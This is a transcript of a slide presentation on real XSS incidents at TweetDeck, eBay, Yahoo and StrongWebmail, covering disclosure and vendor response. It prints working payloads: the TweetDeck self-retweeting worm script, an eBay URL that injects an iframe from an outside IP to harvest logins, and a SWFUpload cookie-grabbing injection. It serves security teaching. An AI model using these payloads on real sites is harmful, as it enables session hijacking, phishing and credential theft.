Presentation is loading. Please wait.

Presentation is loading. Please wait.

XSS VULNERABILITIES Nicole Coppola. XSS - Capabilities Cookie Theft – Session Hijacking Keylogging – addEventListener; passwords, credit cards, etc. Phishing.

Published byVincent Osborne Modified over 8 years ago

Similar presentations

Presentation on theme: "XSS VULNERABILITIES Nicole Coppola. XSS - Capabilities Cookie Theft – Session Hijacking Keylogging – addEventListener; passwords, credit cards, etc. Phishing."— Presentation transcript:

1 XSS VULNERABILITIES Nicole Coppola

2 XSS - Capabilities Cookie Theft – Session Hijacking Keylogging – addEventListener; passwords, credit cards, etc. Phishing “One of the most common and useful XSS attacks is used to steal the user’s session, effectively enabling an attacker to log in as you.” -- Trey Ford, Global Security Strategist at Rapid7 "Cross site scripting attacks aren't new and represent just one of the many vulnerabilities application developers need to consider when building an app like Tweetdeck,” -- Krishna Narayanaswamy, chief scientist at Netskope

3 XSS - Outline Tweetdeck eBay Yahoo Bonus StrongWebmail – Vulnerability Contest Facebook – Self XSS

4 TweetDeck Web application for management of Twitter accounts Founded in 2008 and acquired by Twitter in May 2011

5 TweetDeck Web application for management of Twitter accounts Founded in 2008 and acquired by Twitter in May 2011 June 11, 2014; TweetDeck v. <= 3.7.1; Google Chrome Stored XSS Vulnerability was discovered that allowed users to run JavaScript in tweets Zero Sanitization Did not affect other applications using Twitter’s API

6 TweetDeck Web application for management of Twitter accounts Founded in 2008 and acquired by Twitter in May 2011 June 11, 2014; TweetDeck v. <= 3.7.1; Google Chrome Stored XSS Vulnerability was discovered that allowed users to run JavaScript in tweets Zero Sanitization Did not affect other applications using Twitter’s API User @Firoxl, a 19 year old boy from Austria, discovered this vulnerability because he wanted to tweet hearts with HTML encoding. “&hearts” ->

7 TweetDeck - Example

8 82,138

9 TweetDeck - Example

10 TweetDeck – Lots of trolls

11

12 TweetDeck – How it worked $(‘.xss’).parents().eq(1).find(‘a’).eq(1).click();$(‘[data- action=retweet]’).click();alert(‘XSS in Tweetdeck’)

13 TweetDeck – How it worked $(‘.xss’).parents().eq(1).find(‘a’).eq(1).click();$(‘[data- action=retweet]’).click();alert(‘XSS in Tweetdeck’) - Script tag; named to allow references $(‘.xss).parents().eq(1) - Using jQuery, select self’s second parent element -- Tweet Container.find(‘a’).eq(1).click(); - From this container, select the second ‘a’ (link) tag -- retweet link (popup confirmation; doesn’t actually retweet) $(‘[data-action=retweet]’).click(); - Confirms the popup and retweets alert(‘XSS in Tweetdeck’) - Warning popup to users

14 TweetDeck - Response

15 TweetDeck - Impact TweetDeck User Demographic: Large organizations like BBC (10.1 million followers) Appears that it was largely trolls who exploited this Malicious exploits: Attacker can obtain anything stored on victim’s browser: Cookies, Passwords, Redirect to malicious webpage

16 eBay Full of security holes January 2016 – A Reflected XSS attack was discovered in eBay’s website by independent vulnerability researcher, MLT

17 eBay - XSS http://ebay.com/link/?nav=webview&url=javascript:alert(docume nt.cookie)

18 eBay - XSS

19 Exploit Proof of Concept – phishing attack Create and host a webpage identical to eBay’s login page Craft a link to embed a custom iFrame Harvest credentials

20 eBay - XSS http://ebay.com/link/?nav=webview&url=javascript:document.wri te(‘ ’) http://ebay.com/link/?nav=webview&url=javascript:document.wri te%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/si gnin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500 %22%20height=%221000%22%3E%27%29

21 eBay - XSS http://ebay.com/link/?nav=webview&url=javascript:document.wri te(‘ ’) http://ebay.com/link/?nav=webview&url=javascript:document.wri te%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/si gnin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500 %22%20height=%221000%22%3E%27%29

22 eBay - XSS

23 Sent back to attacker Logs input to log.txt Can be used with: Phishing – Wide audience Spear Phishing – Targeted

24 eBay - Response Reported to eBay December 11, 2015 On January 11, 2016, MLT contacted the media, it was fixed that day “They don’t really have any excuse for their MAIN DOMAIN being vuln to XSS” - MLT Bad history of vulnerabilities and response XSS attack in internal messaging system – took a year to fix, after contacted by media 2014/2015 Backdoor upload in php file 2014 XSS in auction page 2014 Cookie Re-Use 2014 XSS when creating a listing 2011 …

25 eBay - source

26 Yahoo January-February 2013 – Phishing campaign hijacking accounts of Yahoo Mail users Exploited CVE-2012-3414 Vulnerability in SWFUpload 2.2.0.1, used by WordPress v. <= 3.3.2, and patched in April 2012, 9 months prior Vulnerability existed in the developers’ blog Link appeared to bring users to msnbc.com www.msnbc.msn.com-im9.net

27 Yahoo – Phishing Email

28

29 Redirected to website which executed call to developer.yahoo.com, exploiting the vulnerability Disguised as Lightbox library Login at yahoo.com; stay logged in at developer subdomain Steal cookie and contacts list; Repeat

30 Yahoo – XSS (SWFUpload) User input: this.movieName = root.loaderInfo.parameters.movieName; Processing: this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete”; … Callbacks = first parameter to ExternalInterface.call, which executes JavaScript

31 Yahoo – POC - SWFUpload http://site/webapp/applications/swfupload/swfupload_ f9.swf?movieName=";]);}catch(e){} if(!self.a)self.a=!alert(document.cookie);//

32 Yahoo – POC – SWFUpload http://site/webapp/applications/swfupload/swfupload_ f9.swf?movieName=";]);}catch(e){} if(!self.a)self.a=!alert(document.cookie);// Exploited (unsanitized) Parameter

33 Yahoo – POC – SWFUpload http://site/webapp/applications/swfupload/swfupload_f 9.swf?movieName=";]);}catch(e){} if(!self.a)self.a=!alert(document.cookie);// Exits callback function this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete”; …

34 Yahoo – POC – SWFUpload http://site/webapp/applications/swfupload/swfupload_f 9.swf?movieName=";]);}catch(e){} if(!self.a)self.a=!alert(document.cookie);// Defining self.a to execute payload

35 Yahoo - Response Unpatched, “unrelated” site “Drive-by Download” History of Hacks and Vulnerabilities Mobile mail website XSS – November 2015 HTML email XSS – December 2015 Login XSS – December 2010 … 48 “Yahoo” CVE records on NVD

36 Yahoo - Response T-Shirt-Gate Yahoo started by giving people t-shirts / $12.50 discount code for their store Can sell exploits for more profit; other companies offer rewards Angry that they got $12.50 for their research Yahoo Bug Bounty Program $50-$15,000 reward for finding bugs October 2013

37 StrongWebmail client – Bonus XSS StrongWebmail claims to have “the most secure email accounts on the planet” Two factor authentication – must answer confirmation call before being authenticated Held contest for anyone who can hack the CEO’s email account - $10,000 prize

38 StrongWebmail client – Bonus XSS XSS Vulnerability in subject field Wrote an exploit to grab the inbox, session cookies, and task list (calendar), and log to a file Sent spear phishing email to CEO claiming to have found the XSS exploit, with details in a file. Didn’t know if he would click on it... So emailed support@strongwebmail.com following up support@strongwebmail.com StrongWebmail claimed they didn’t break the authentication, but ended up awarding the prize

39 Facebook - Bonus XSS

40

41

42 In Summary TweetDeck Scripting possible in the tweet body Self re-tweeting eBay Javascript injection in URL Allowed injection of iFrame for phishing and credential harvesting Yahoo Unpatched Yahoo developer WordPress blog Allowed cookie harvesting through phishing

43 In Conclusion Vulnerabilities out there; people make mistakes 3 rd party code Months between vulnerability being created and discovered Many ways to exploit these vulnerabilities Phishing Imitating website Getting cookie Self replicating worms Users do not think things through Clicking links Exploiting yourself with malicious code Not noticing odd looking screens Response to these attacks matters Hours, months Confidence of users (Thousands of people left TweetDeck to HootSuite) Potential impact

44 Questions?

45 Sources - TweetDeck http://www.computerweekly.com/news/2240222426/Twitter- suspends-TweetDeck-over-XSS-security-flaw http://www.computerweekly.com/news/2240222426/Twitter- suspends-TweetDeck-over-XSS-security-flaw http://webtrends.about.com/od/Twitter-Web/a/What-Is- Tweetdeck.htm http://webtrends.about.com/od/Twitter-Web/a/What-Is- Tweetdeck.htm http://money.cnn.com/2014/06/11/technology/security/tweetdec k-hacked/index.html http://money.cnn.com/2014/06/11/technology/security/tweetdec k-hacked/index.html http://thenextweb.com/twitter/2014/06/11/tweetdeck-users-xss- vulnerability-means-revoke-access-now/#gref http://thenextweb.com/twitter/2014/06/11/tweetdeck-users-xss- vulnerability-means-revoke-access-now/#gref http://www.theguardian.com/technology/2014/jun/11/twitter- tweetdeck-xss-flaw-users-vulnerable http://www.theguardian.com/technology/2014/jun/11/twitter- tweetdeck-xss-flaw-users-vulnerable http://www.onthemedia.org/story/why-hell-tweetdeck- retweeting-my-little-pony-twitter-account/ http://www.onthemedia.org/story/why-hell-tweetdeck- retweeting-my-little-pony-twitter-account/ http://www.acunetix.com/blog/articles/tweetdeck-worm-worked/

46 Sources - eBay 2015 XSS http://www.securityweek.com/xss-flaw-exposed-ebay-users- phishing-attacks http://www.securityweek.com/xss-flaw-exposed-ebay-users- phishing-attacks https://ret2libc.wordpress.com/2016/01/11/a-tale-of-ebay-xss-and- shoddy-incident-response/ https://ret2libc.wordpress.com/2016/01/11/a-tale-of-ebay-xss-and- shoddy-incident-response/ Previous Attacks http://motherboard.vice.com/read/a-flaw-on-ebays-site-allowed- hackers-to-steal-users-passwords http://motherboard.vice.com/read/a-flaw-on-ebays-site-allowed- hackers-to-steal-users-passwords http://thehackernews.com/2014/05/worst-day-for-ebay-multiple- flaws-leave.html http://thehackernews.com/2014/05/worst-day-for-ebay-multiple- flaws-leave.html https://threatpost.com/a-year-later-xss-vulnerability-still-exists-in- ebay/112493/ https://threatpost.com/a-year-later-xss-vulnerability-still-exists-in- ebay/112493/ https://dl.packetstormsecurity.net/1107-exploits/ebay-xss.pdf

47 Sources - Yahoo http://news.softpedia.com/news/Hackers-Hijack-Yahoo-Accounts-by-Stealing- Authentication-Cookies-325460.shtml http://news.softpedia.com/news/Hackers-Hijack-Yahoo-Accounts-by-Stealing- Authentication-Cookies-325460.shtml https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3414 https://threatpost.com/yahoo-mail-breach-linked-old-wordpress-vulnerability- 013113/77478/ https://threatpost.com/yahoo-mail-breach-linked-old-wordpress-vulnerability- 013113/77478/ http://www.nbcnews.com/technology/why-yahoo-email-accounts-are-being-hijacked- 1B8219490 http://www.nbcnews.com/technology/why-yahoo-email-accounts-are-being-hijacked- 1B8219490 http://www.pcworld.com/article/2026798/email-attack-exploits-vulnerability-in-yahoo- site-to-hijack-accounts.html http://www.pcworld.com/article/2026798/email-attack-exploits-vulnerability-in-yahoo- site-to-hijack-accounts.html http://www.hotforsecurity.com/blog/yahoo-accounts-hijacked-via-xss-type-attack- 5172.html#comments http://www.hotforsecurity.com/blog/yahoo-accounts-hijacked-via-xss-type-attack- 5172.html#comments https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/ http://news.yahoo.com/why-yahoo-mail-accounts-being-hijacked-004126309.html http://www.securityweek.com/stored-xss-found-yahoo-mail-mobile http://www.theregister.co.uk/2016/01/19 /finnishii_bugii_hunterii_netsii_10kii_bountyii_fromii_yahooii/ http://www.theregister.co.uk/2016/01/19 /finnishii_bugii_hunterii_netsii_10kii_bountyii_fromii_yahooii/ http://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/ http://krebsonsecurity.com/2012/11/yahoo-email-stealing-exploit-fetches-700/ http://yahoodevelopers.tumblr.com/post/65622522325/the-bug-bounty-program-is- now-live http://yahoodevelopers.tumblr.com/post/65622522325/the-bug-bounty-program-is- now-live

48 Sources - Bonus StrongWebmail http://news.softpedia.com/news/Webmail-Service-CEO-Hack-My-E- mail-Get-10-000-113478.shtml http://news.softpedia.com/news/Webmail-Service-CEO-Hack-My-E- mail-Get-10-000-113478.shtml http://www.zdnet.com/article/strongwebmail-ceos-mail-account- hacked-via-xss/ http://www.zdnet.com/article/strongwebmail-ceos-mail-account- hacked-via-xss/ https://web.archive.org/web/20111211040709/http://www.fireblog.co m/exclusive-interview-with-strongwebmails-10000-hacker/ https://web.archive.org/web/20111211040709/http://www.fireblog.co m/exclusive-interview-with-strongwebmails-10000-hacker/ Facebook https://www.facebook.com/help/757846550903291 http://thehackernews.com/2014/07/facebook-self-xss-scam-fools- users-into_28.html http://thehackernews.com/2014/07/facebook-self-xss-scam-fools- users-into_28.html https://www.youtube.com/watch?v=XrzSaohJ0a8

Download ppt "XSS VULNERABILITIES Nicole Coppola. XSS - Capabilities Cookie Theft – Session Hijacking Keylogging – addEventListener; passwords, credit cards, etc. Phishing."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Chrome Extentions Vulnerabilities. Introduction Google Chrome Browser Chrome OS Platform Chrome Web Store Applications Open Source Platform.

Chrome Extentions Vulnerabilities. Introduction Google Chrome Browser Chrome OS Platform Chrome Web Store Applications Open Source Platform.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.
Team Members: Brad Stancel,

Team Members: Brad Stancel,
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
Jason Rich CIS - 158 1.  The purpose of this project is to inform the audience about the act of phishing. Phishing is when fake websites are created.

Jason Rich CIS  The purpose of this project is to inform the audience about the act of phishing. Phishing is when fake websites are created.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
Ben Livshits and Weidong Cui Microsoft Research Redmond, WA.

Ben Livshits and Weidong Cui Microsoft Research Redmond, WA.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 4 Application Security Knowledge and Test Prep

Chapter 4 Application Security Knowledge and Test Prep
March Intensive: XSS Exploits

March Intensive: XSS Exploits
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
DIGITAL CITIZENSHIP 6 TH – 8 TH UNIT 1 LESSON 3 SCAMS & SCHEMES What is identity theft, and how can you protect yourself from it?

DIGITAL CITIZENSHIP 6 TH – 8 TH UNIT 1 LESSON 3 SCAMS & SCHEMES What is identity theft, and how can you protect yourself from it?

Similar presentations

Ads by Google